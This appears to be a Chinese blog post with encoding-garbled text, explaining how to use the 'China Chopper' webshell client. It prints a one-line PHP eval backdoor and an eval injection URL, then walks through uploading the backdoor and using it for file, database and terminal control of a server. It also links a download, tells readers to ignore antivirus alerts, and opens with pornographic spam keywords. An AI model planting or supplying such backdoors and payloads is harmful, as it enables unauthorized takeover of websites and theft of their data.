亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

中國(guó)菜刀的功能介紹和使用方法(黑站利器與后門利用測(cè)試工具)

代瀟瑞博客   發(fā)布時(shí)間:2014-05-09 14:49:07   作者:佚名   我要評(píng)論
中國(guó)菜刀,一個(gè)非常好用而又強(qiáng)大的webshell,它可不是用來(lái)切菜的做飯的道具哦,是一款專業(yè)的網(wǎng)站管理軟件,大小只有300多KB,真是小巧實(shí)用啊

中國(guó)菜刀,一個(gè)非常好用而又強(qiáng)大的webshell,它可不是用來(lái)切菜的做飯的道具哦,是一款專業(yè)的網(wǎng)站管理軟件,大小只有300多KB,真是小巧實(shí)用??!不過(guò)被不法分子利用到,就是一個(gè)黑站的利器了。我記得以前接觸的時(shí)候摸索了好久才會(huì)用,哈哈。。后來(lái)領(lǐng)悟之后才發(fā)現(xiàn)并不難操作,同時(shí)功能也比我想象的要強(qiáng)大。

注:?jiǎn)为?dú)的菜刀沒(méi)有效果,需要服務(wù)器端有一句話后門,或漏洞,例如這樣的

http://127.0.0.1:89/mingfang/index.php?q=${${@eval%28$_POST[cmd]%29}}

配置圖:

1.中國(guó)菜刀支持的服務(wù)端腳本:PHP、ASP、asp.net;

2.主要功能有:文件管理(有足夠的權(quán)限時(shí)候可以管理整個(gè)磁盤/文件系統(tǒng)),數(shù)據(jù)庫(kù)管理,虛擬終端。

3.菜刀的工作原理是:利用上傳到服務(wù)器的一句話腳本再通過(guò)一些添加配置就可以工作了。

今天我只介紹PHP的方法(其他的大同小異)。

首先:我們首先要新建一個(gè)php文件,文件名隨意取,然后寫入一句代碼:

<?php eval($_POST['ee']); ?>

 ;eval()這個(gè)函數(shù)大家并不陌生吧,就是把里面的字符串作為PHP代碼執(zhí)行。最后把這個(gè)文件保存,上傳到你站點(diǎn)里面,可以是根目錄,也可以是其他,都行的。如下圖:

第二步:打開(kāi)菜刀這個(gè)軟件,進(jìn)入如下界面,右鍵點(diǎn)擊“添加”;如下圖:

第三步:此時(shí)會(huì)彈出一個(gè)添加shell的對(duì)話框,由圖一看出我的 “dxr.php”上傳在站點(diǎn)根目錄,所以這里的地址填為:http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”,也就是

<?php eval($_POST['ee']); ?>

這里的“ee”。下面配置項(xiàng)如果你知道用戶名密碼就填,不知道,不填,也不會(huì)影響文件管理和虛擬終端這兩個(gè)功能,只是不能查看數(shù)據(jù)庫(kù)了。

最后:點(diǎn)擊“添加”按鈕,成功后就會(huì)產(chǎn)生一條新的記錄,鼠標(biāo)右鍵點(diǎn)擊就可以進(jìn)行操作了,如下圖,可以進(jìn)行文件管理,數(shù)據(jù)庫(kù)管理,虛擬終端。哈哈...大功告成!!

   

所以很多黑站者利用一些網(wǎng)站漏洞,上傳一句話木馬后,就基本上可以黑下你的站了。中國(guó)菜刀,就是這么強(qiáng)大!!

操作效果截圖一:

 

操作效果截圖二:

 

操作效果截圖三:


菜刀下載:http://chabaoo.cn/softs/163997.html

終于寫完了,喜歡的話就支持一下哦,代瀟瑞博客,專注于PHP學(xué)習(xí)?。?/p>

最后說(shuō)明一下:此軟件打開(kāi)時(shí)殺毒軟件可能會(huì)報(bào)毒的,我已經(jīng)用了很多遍,反正都沒(méi)事。如果你不相信的話,也就不用下載了,呵呵。

原文參考:http://www.daixiaorui.com/read/17.html

相關(guān)文章

最新評(píng)論